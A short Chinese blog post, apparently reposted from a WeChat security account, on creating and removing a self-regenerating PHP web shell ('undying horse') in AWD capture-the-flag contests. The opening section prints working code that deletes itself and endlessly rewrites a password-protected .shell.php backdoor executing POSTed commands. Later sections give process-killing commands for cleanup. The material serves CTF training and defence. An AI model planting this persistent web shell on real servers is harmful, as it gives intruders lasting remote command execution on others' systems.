0x00 创建
md5加密密码:
代码:
ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file = '.shell.php';$code = '<?php if(md5($_GET["pass"])=="2591c98b70119fe624898b1e424b5e91"){@system($_POST[cmd]);} ?>';while (1){file_put_contents($file,$code);}
触发执行:
0x01 查看
权限:
内容:
执行:
0x02 查杀
root用户角度的查杀:
1、杀掉进程
ps aux | grep www-data | awk '{print $2}' | xargs kill -92、重启服务
重启web服务。
其他用户的查杀:
在awd中,ctf用户没有权限,不能重启服务,而且,以ctf的用户来杀进程和条件竞争也是不可行的。
(不死马会先创建,然后被删除,在创建到被删除的过程中会可利用。)
最简单的方式就是以www-data用户的角度通过杀进程来实现查杀。
1、杀掉进程:
<?php@system("ps -aux | grep www-data | awk '{print $2}' | xargs kill -9");
2、条件竞争:
不推荐,如果不死马中没有调用usleep()函数,进行延时的话,条件竞争是gg的。
作者:RJ45
原文链接:https://rj45mp.github.io/bushima/
原文始发于微信公众号(菜鸟学信安):干货|不死马的创建和查杀
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论